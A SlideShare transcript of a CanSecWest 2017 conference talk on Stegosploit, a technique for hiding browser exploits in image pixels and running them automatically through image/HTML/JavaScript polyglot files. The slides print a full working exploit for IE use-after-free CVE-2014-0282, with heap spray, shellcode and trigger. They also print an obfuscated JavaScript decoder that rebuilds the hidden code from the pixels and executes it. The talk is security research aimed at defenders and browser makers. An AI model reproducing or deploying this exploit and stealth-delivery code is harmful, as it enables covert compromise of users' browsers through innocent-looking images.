CanSecWest, profile picture
Uploaded byCanSecWest
PDF, PPTX1,161 views

CSW2017 Saumil shah stegosploit_internals_cansecwest_2017

CanSecWest 2017

Embed presentation

Download as PDF, PPTX
NETSQUARE THE INTERNALS OF STEGANOGRAPHY AND POLYGLOTS SAUMIL SHAH CANSECWEST 2017 STEGOSPLOIT
NETSQUARE Agenda •  Design goals •  Stegosploit-ing an exploit •  Steganography techniques •  The decoder •  Polyglot Images •  Conclusions
NETSQUARE A good exploit is one that is delivered in style
NETSQUARENETSQUARE Stegosploit Design Goals •  Only VALID images on network and disk. •  Exploit code hidden in pixels. •  Self contained decoder code. •  Exploit automatically decoded and triggered upon loading... •  ...all with just ONE IMAGE, •  in STYLE!
NETSQUARE Steganography NETSQUARE
NETSQUARE Polyglots Two or more data formats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGET BROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -  IE CInput Use-After-Free -  hidden in a JPG Case study: CVE-2013-1690 -  FF onreadystatechange UAF -  hidden in a PNG
NETSQUARE Step 1. Hiding the Exploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
NETSQUARE Hiding an Exploit in an Image string = 01010011 01000001 01010101 01001101 01001001 01001100
NETSQUARE ganesha.jpg Hiding an Exploit in an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f++){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c} var l=function(a){return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h); this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}}; H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b++){if(b>=8192){b=0}a.data[c]= (b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData (c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a){this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfcxe8x89x00x00 x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2 x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5b x5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50 x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfb xe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)}c.push(1371756627);c.push(1371351263);var f=[1371756626, 215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,202121248,16 384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array(); for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag){document.getElementById('fm') .innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b+='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run(){spray();document.getElementById('c2').checked=true; document.getElementById('c2').onpropertychange=changer;flag=true;document.getElementById('fm').reset()} setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
NETSQUARE ganesha.jpg Hiding an Exploit in an Image ganesha_CVE-2014-0282.jpg
NETSQUARE 1 pixel = 8 bits (grayscale) Breaking down an image into "bit layers" 7  6 5 4 3 2 1 0 | | MSB LSB
NETSQUARE more shape less detail 7 6 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
NETSQUARE
NETSQUARE 7 6 5 4 3 2 1 0
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 7 Significant visual aberration
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 2 No perceptible visual aberration
NETSQUARE Step 2. Decoding the encoded Pixel Data ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
NETSQUARE HTML5 CANVAS to the rescue! •  In-browser decoding of steganographically encoded images. •  Read image pixel data using JS. •  Rebuild JS exploit code from pixel data, in memory. •  Simple array and bit manipulation operations.
NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));return s} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
NETSQUARE Step 3. Images that ``Auto Run`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
NETSQUARE IMAJS I SEE PIXELS I SEE CODE
NETSQUARE IMAJS - Image+JS Polyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
NETSQUARE "Nakatomi space", wherein buildings reveal near-infinite interiors, capable of being traversed through all manner of non-architectural means http://www.bldgblog.com/2010/01/nakatomi-space/
NETSQUARE IMAJS-JPG JPG +HTML +JS +CSS
NETSQUARE JPG Header SOI FF D8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
NETSQUARE IMAJS-JPG SOI FF D8 APP0 length J F I F 0 versn Xres FF E0 U Yres H V Nakatomi Space! ... more random data ... <html random random random random > and other HTML stuff goes here... <head random> IMAJS decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
NETSQUARE IMAJS-PNG Inspiration: http://daeken.com/superpacking-js-demos PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... > CRC <head random> IMAJS decoder script and other HTML stuff goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
NETSQUARE Concluding Thoughts
NETSQUARE 2010: Theory, 2014: Practice
NETSQUARE Today's attacks succeed because the defense is REACTIVE
NETSQUARE Today's Infosec Defence? Rules Signatures Updates Machine Learning
NETSQUARE How Compilers treat Devs
NETSQUARE How Browsers treat Devs
NETSQUARE Browsers and W3C - Wake Up! Dear BROWSERS, •  Don't be afraid to "BREAK THE WEB". •  Reject content that does not conform to strict standards/specs. Dear W3C, •  STRICT parsing rules – like COMPILERS. •  Browser compliance and user- awareness is YOUR responsibility.
NETSQUARE Tools http://stegosploit.info Paper PoC||GTFO 0x08
NETSQUARE THE END Saumil Shah @therealsaumil saumilshah saumil@net-square.com Photography: flickr.com/saumil f /my.spectral.lines

More Related Content

PDF
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
byCanSecWest
 
PDF
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
byCanSecWest
 
PDF
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
byCanSecWest
 
PDF
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
byCanSecWest
 
PDF
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
byCanSecWest
 
PDF
CSW2017 Scott kelly secureboot-csw2017-v1
byCanSecWest
 
PDF
CSW2017 Harri hursti csw17 final
byCanSecWest
 
PDF
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
byCanSecWest
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
byCanSecWest
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
byCanSecWest
 
CSW2017 Minrui yan+Jianhao-liu a visualization tool for evaluating can-bus cy...
byCanSecWest
 
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
byCanSecWest
 
CSW2017 Privilege escalation on high-end servers due to implementation gaps i...
byCanSecWest
 
CSW2017 Scott kelly secureboot-csw2017-v1
byCanSecWest
 
CSW2017 Harri hursti csw17 final
byCanSecWest
 
CSW2017 Kyle ehmke lots of squats- ap-ts never miss leg day
byCanSecWest
 

Viewers also liked

PDF
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
byCanSecWest
 
PDF
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
byCanSecWest
 
PDF
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
byCanSecWest
 
PDF
Csw2016 wang docker_escapetechnology
byCanSecWest
 
PDF
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
byCanSecWest
 
PDF
Csw2016 economou nissim-getting_physical
byCanSecWest
 
PDF
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
byCanSecWest
 
PDF
CSW2017 jun li_car anomaly detection
byCanSecWest
 
PDF
CSW2017 Qidan he+Gengming liu_cansecwest2017
byCanSecWest
 
PDF
Csw2016 d antoine_automatic_exploitgeneration
byCanSecWest
 
PDF
Csw2016 chen grassi-he-apple_graphics_is_compromised
byCanSecWest
 
PDF
Csw2016 julien moinard-hardsploit
byCanSecWest
 
PDF
Csw2016 macaulay eh_trace-rop_hooks
byCanSecWest
 
PDF
Csw2016 gawlik bypassing_differentdefenseschemes
byCanSecWest
 
PDF
Csw2016 tang virtualization_device emulator testing technology
byCanSecWest
 
PDF
CSW2017 chuanda ding_state of windows application security
byCanSecWest
 
PDF
Csw2016 evron sysman_apt_reports_and_opsec_evolution
byCanSecWest
 
PDF
Csw2016 freingruber bypassing_application_whitelisting
byCanSecWest
 
PDF
Csw2016 song li-smart_wars
byCanSecWest
 
PDF
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
byCanSecWest
 
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
byCanSecWest
 
CSW2017 Enrico branca What if encrypted communications are not as secure as w...
byCanSecWest
 
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
byCanSecWest
 
Csw2016 wang docker_escapetechnology
byCanSecWest
 
CSW2017 Weston miller csw17_mitigating_native_remote_code_execution
byCanSecWest
 
Csw2016 economou nissim-getting_physical
byCanSecWest
 
CSW2017 Amanda rousseau cansecwest2017_net_hijacking_powershell
byCanSecWest
 
CSW2017 jun li_car anomaly detection
byCanSecWest
 
CSW2017 Qidan he+Gengming liu_cansecwest2017
byCanSecWest
 
Csw2016 d antoine_automatic_exploitgeneration
byCanSecWest
 
Csw2016 chen grassi-he-apple_graphics_is_compromised
byCanSecWest
 
Csw2016 julien moinard-hardsploit
byCanSecWest
 
Csw2016 macaulay eh_trace-rop_hooks
byCanSecWest
 
Csw2016 gawlik bypassing_differentdefenseschemes
byCanSecWest
 
Csw2016 tang virtualization_device emulator testing technology
byCanSecWest
 
CSW2017 chuanda ding_state of windows application security
byCanSecWest
 
Csw2016 evron sysman_apt_reports_and_opsec_evolution
byCanSecWest
 
Csw2016 freingruber bypassing_application_whitelisting
byCanSecWest
 
Csw2016 song li-smart_wars
byCanSecWest
 
CSW2017 Mickey+maggie low cost radio attacks on modern platforms
byCanSecWest
 

CSW2017 Saumil shah stegosploit_internals_cansecwest_2017

  • 1.
    NETSQUARE THE INTERNALS OFSTEGANOGRAPHY AND POLYGLOTS SAUMIL SHAH CANSECWEST 2017 STEGOSPLOIT
  • 2.
    NETSQUARE Agenda •  Design goals • Stegosploit-ing an exploit •  Steganography techniques •  The decoder •  Polyglot Images •  Conclusions
  • 3.
    NETSQUARE A good exploit isone that is delivered in style
  • 4.
    NETSQUARENETSQUARE Stegosploit Design Goals • Only VALID images on network and disk. •  Exploit code hidden in pixels. •  Self contained decoder code. •  Exploit automatically decoded and triggered upon loading... •  ...all with just ONE IMAGE, •  in STYLE!
  • 5.
  • 6.
    NETSQUARE Polyglots Two or more dataformats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
  • 7.
    NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGETBROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -  IE CInput Use-After-Free -  hidden in a JPG Case study: CVE-2013-1690 -  FF onreadystatechange UAF -  hidden in a PNG
  • 8.
    NETSQUARE Step 1. Hiding theExploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
  • 9.
    NETSQUARE Hiding an Exploitin an Image string = 01010011 01000001 01010101 01001101 01001001 01001100
  • 10.
    NETSQUARE ganesha.jpg Hiding an Exploitin an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f++){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c} var l=function(a){return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h); this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}}; H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b++){if(b>=8192){b=0}a.data[c]= (b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData (c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a){this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfcxe8x89x00x00 x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2 x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5b x5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50 x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfb xe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)}c.push(1371756627);c.push(1371351263);var f=[1371756626, 215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,202121248,16 384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array(); for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag){document.getElementById('fm') .innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b+='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run(){spray();document.getElementById('c2').checked=true; document.getElementById('c2').onpropertychange=changer;flag=true;document.getElementById('fm').reset()} setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
  • 11.
    NETSQUARE ganesha.jpg Hiding an Exploitin an Image ganesha_CVE-2014-0282.jpg
  • 12.
    NETSQUARE 1 pixel =8 bits (grayscale) Breaking down an image into "bit layers" 7  6 5 4 3 2 1 0 | | MSB LSB
  • 13.
    NETSQUARE more shape less detail 76 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
  • 14.
  • 15.
    NETSQUARE 7 6 54 3 2 1 0
  • 16.
    NETSQUARE Exploit code convertedto bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
  • 17.
    Encoding data atbit layer 7 Significant visual aberration
  • 18.
    NETSQUARE Exploit code convertedto bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
  • 19.
    Encoding data atbit layer 2 No perceptible visual aberration
  • 20.
    NETSQUARE Step 2. Decoding the encoded PixelData ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
  • 21.
    NETSQUARE HTML5 CANVAS tothe rescue! •  In-browser decoding of steganographically encoded images. •  Read image pixel data using JS. •  Rebuild JS exploit code from pixel data, in memory. •  Simple array and bit manipulation operations.
  • 22.
